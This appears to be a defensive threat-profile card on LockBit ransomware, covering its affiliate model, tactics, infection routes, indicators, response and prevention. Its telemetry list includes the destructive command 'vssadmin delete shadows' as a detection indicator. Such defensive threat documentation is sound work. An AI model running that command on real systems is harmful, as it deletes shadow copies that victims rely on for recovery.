KritischAktivIm Trend
Critical Risk
95%
LockBit Ransomware
Affiliate-based ransomware known for fast encryption and double extortion.
#ransomware#double-extortion#windows
Bedrohungsübersicht
LockBit operates as a ransomware-as-a-service platform. Affiliates deploy encryptors across networks, exfiltrate sensitive data, and publish leaks to pressure victims into paying ransoms.
Angriffsverhalten
- Mass file encryption using hybrid AES + RSA schemes
- Shadow copy and backup service deletion
- Data exfiltration prior to encryption for double extortion
- Lateral movement via stolen credentials and RDP
Infektionswege
- Phishing attachments
- Exploited VPN or RDP endpoints
- Malicious email links
- Supply-chain compromise
Symptome & Indikatoren
- Renamed files with unusual extensions
- Ransom notes on desktops
- Disabled recovery tools
- Unexpected network traffic spikes
Sofortige Abwehr
- Isolate affected endpoints immediately
- Preserve forensic images before cleanup
- Notify legal and incident response teams
- Do not pay ransom without professional guidance
Entfernungsanleitung
- Boot from clean media and scan offline
- Restore from verified offline backups
- Rebuild compromised domain controllers
- Rotate all domain credentials
Präventionsmethoden
- Enable behavioral ransomware protection
- Maintain immutable offline backups
- Patch edge services and disable unused RDP
- Enforce least-privilege access
Telemetrie-Indikatoren
- vssadmin delete shadows
- Mass .lockbit extension renames
- Suspicious PowerShell download cradle
LockBit campaigns continue through affiliate networks despite law-enforcement disruptions. Treat it as an active high-risk family.